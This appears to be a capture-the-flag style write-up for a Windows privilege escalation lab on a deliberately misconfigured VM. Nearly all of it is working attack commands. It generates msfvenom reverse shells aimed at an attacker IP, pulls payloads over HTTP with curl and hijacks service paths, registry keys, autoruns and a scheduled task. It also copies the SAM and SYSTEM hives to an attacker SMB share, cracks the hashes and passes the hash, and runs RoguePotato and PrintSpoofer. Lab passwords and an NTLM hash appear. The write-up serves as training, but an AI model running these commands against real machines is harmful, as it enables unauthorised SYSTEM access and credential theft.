Skip to content

Latest commit

 

History

History
422 lines (260 loc) · 11.3 KB

windows10privesc.md

File metadata and controls

422 lines (260 loc) · 11.3 KB

Windows PrivEsc

Practice your Windows Privilege Escalation skills on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM! RDP is available. Credentials: user:password321

Generate a Reverse Shell Executable

generate a reverse shell executable using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.37.45 LPORT=4444 -f exe -o reverse.exe
python3 -m http.server

on windows 10 machine

curl 10.18.37.45:8000/reverse.exe -o reverse.exe

image

Service Exploits - Insecure Service Permissions

use accesschk.exe to check the "user" account's permissions on the "daclsvc" service

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

note that we has permission to change the service config

image

query the service

sc qc daclsvc

note that it runs with LocalSystem privileges

image

modify the service config and set the binpath to our reverse.exe

sc config daclsvc binpath= "\"C:\Users\user\Desktop\reverse.exe\""

image

now, start another listener and run the service

net start daclsvc

image

Service Exploits - Unquoted Service Path

query the "unquotedsvc" service

sc qc unquotedsvc

note that it runs with LocalSystem privileges and the BINARY_PATH_NAME is unquoted and contains spaces

image

using accesschk.exe again

C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

note that BUILTIN\Users group is allowed to write

image

copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

now, start another listener and run the service

net start unquotedsvc

image

Service Exploits - Weak Registry Permissions

query the "regsvc" service

sc qc regsvc

note that it runs with LocalSystem privileges

image

using accesschk.exe again

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

note that the registry entry is writable by the "NT AUTHORITY\INTERACTIVE" group (all logged-on users)

image

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\user\Desktop\reverse.exe /f

now, start another listener and run the service

net start regsvc

image

Service Exploits - Insecure Service Executables

query the "filepermsvc" service

sc qc filepermsvc

image

using accesschk.exe again

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

note that the service binary is writable by everyone

image

copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

now, start another listener and run the service

net start filepermsvc

image

Registry - AutoRuns

query the registry for AutoRun executables

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

image

using accesschk.exe again

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

note that the AutoRun program is writable by everyone

image

copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

now, start another listener

restart the windows machine and login again to trigger reverse shell

image

Registry - AlwaysInstallElevated

query the registry for AlwaysInstallElevated keys

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

note that both keys are set to 1 (0x1)

image

generate a reverse shell Windows Installer using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.37.45 LPORT=4444 -f msi -o reverse.msi
python3 -m http.server

on windows 10 machine

curl 10.18.37.45:8000/reverse.msi -o reverse.msi

image

now, start another listener and run the service

msiexec /quiet /qn /i C:\Users\user\Desktop\reverse.msi

image

Passwords - Registry

before this step, admin account need login with admin:password123

sometimes registry can be searched for keys and values that contain the word "password"

reg query HKLM /f password /t REG_SZ /s

or query this specific key to find admin AutoLogon credentials

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

image

Passwords - Saved Creds

list any saved credentials

cmdkey /list

image

now, start another listener and run the service

runas /savecred /user:admin C:\Users\admin\Desktop\reverse.exe

Passwords - Security Account Manager (SAM)

the SAM and SYSTEM files can be used to extract user password hashes

transfer the SAM and SYSTEM files to our machine

on our machine

python3 /usr/share/doc/python3-impacket/examples/smbserver.py share .

on windows VM

copy C:\Windows\Repair\SAM \\10.18.37.45\share\
copy C:\Windows\Repair\SYSTEM \\10.18.37.45\share\

image

now, dump the hash

git clone https://github.com/Tib3rius/creddump7
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM

image

crack the admin NTLM hash using hashcat

hashcat -m 1000 --force hash.txt /usr/share/wordlists/rockyou.txt

we got 2 passwords are admin:password123 and Administrator:Passw0rd!

Passwords - Passing the Hash

you can authenticate using the hash

use the full admin hash with pth-winexe without needing to crack password

pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.13.218 cmd.exe

Scheduled Tasks

view the contents of CleanUp.ps1 script

type C:\DevTools\CleanUp.ps1

image

using accesschk.exe again

C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

note that we have the ability to write this file

image

echo C:\Users\user\Desktop\reverse.exe >> C:\DevTools\CleanUp.ps1

now, start another listener and wait for Scheduled Task

image

Insecure GUI Apps

login as user account, open "AdminPaint" on Desktop

image

tasklist /V | findstr mspaint.exe

note that Paint is running with admin privilege

image

In Paint, click "File" and then "Open", navigation to C:\Windows\System32\cmd.exe

image

Startup Apps

using accesschk.exe to check StartUp directory

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

note that the BUILTIN\Users group can write files

image

using cscript which should create a new shortcut to your reverse.exe executable in the StartUp directory

cscript C:\PrivEsc\CreateShortcut.vbs

now, start another listener

restart the windows machine and login again to trigger reverse shell

Token Impersonation - Rogue Potato

set up a socat redirector, forwarding attacker port 135 to port 9999 on Windows

sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.13.218:9999

start another listener

simulate getting a service account shell by logging into RDP as the admin user, starting an command prompt as administrator

using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the "local service" account

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\Users\user\Desktop\reverse.exe

start another listener

now, in the "local service" reverse shell you triggered, run the RoguePotato exploit to trigger a second reverse shell with SYSTEM privileges

C:\PrivEsc\RoguePotato.exe -r 10.18.37.45 -e "C:\Users\user\Desktop\reverse.exe" -l 9999

two user privileges that allows this exploit to work

image

Token Impersonation - PrintSpoofer

do the same 2 steps before, but now we use PrintSpoofer exploit instead of RoguePotato

C:\PrivEsc\PrintSpoofer.exe -c "C:\Users\user\Desktop\reverse.exe" -i

Privilege Escalation Scripts

several tools have been written which help find potential privilege escalations on Windows

  • winPEASany.exe
  • Seatbelt.exe
  • PowerUp.ps1
  • SharpUp.exe